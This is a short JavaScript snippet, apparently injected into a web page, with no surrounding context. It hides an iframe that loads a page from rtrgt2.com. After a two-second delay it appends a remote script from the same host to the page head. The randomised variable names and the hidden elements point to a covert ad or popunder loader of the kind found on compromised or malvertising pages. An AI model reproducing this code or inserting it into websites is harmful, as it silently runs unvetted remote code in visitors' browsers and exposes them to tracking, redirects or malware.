    var iframe418970f = document.createElement('iframe');
    iframe418970f.setAttribute('style', 'display:none; position:absolute; top:0px; left:0px;');
    iframe418970f.setAttribute('src', "http:\/\/rtrgt2.com\/fpix.php?zoneid=12040");
    document.getElementsByTagName('body')[0].appendChild(iframe418970f);
    setTimeout(function()
    {
        var secondScriptJs418970f = document.createElement('script');
        secondScriptJs418970f.src = "http:\/\/rtrgt2.com\/apu.php?zoneid=12040&final";
        secondScriptJs418970f.type = "text/javascript";
        secondScriptJs418970f.language = "javascript";
        var head418970f = document.getElementsByTagName('head')[0];
        head418970f.appendChild(secondScriptJs418970f);
    }, 2000);